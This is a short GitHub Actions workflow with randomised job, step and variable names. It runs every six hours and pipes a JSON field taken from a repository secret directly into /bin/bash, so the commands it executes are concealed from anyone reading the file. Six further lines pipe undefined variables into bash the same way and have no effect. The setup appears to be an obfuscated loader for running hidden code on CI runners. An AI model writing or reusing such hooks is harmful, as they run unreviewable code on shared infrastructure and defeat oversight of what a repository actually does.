name: heqizheng6789
on:
  workflow_dispatch:
  schedule:
    - cron: '0 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: heqizheng6789
        env:
          vlv50: ${{ secrets.vlv50 }}
        run: |
          echo $vlv50 | jq -r .z7703 | /bin/bash
          echo $oq2451 | jq -r .rzj3537 | /bin/bash
          echo $va758 | jq -r .szbq20479 | /bin/bash
          echo $yywnv5262 | jq -r .ztqqg1 | /bin/bash
          echo $qaro32323 | jq -r .x0126 | /bin/bash
          echo $mtc65 | jq -r .ok84691 | /bin/bash
          echo $q26 | jq -r .n9659 | /bin/bash

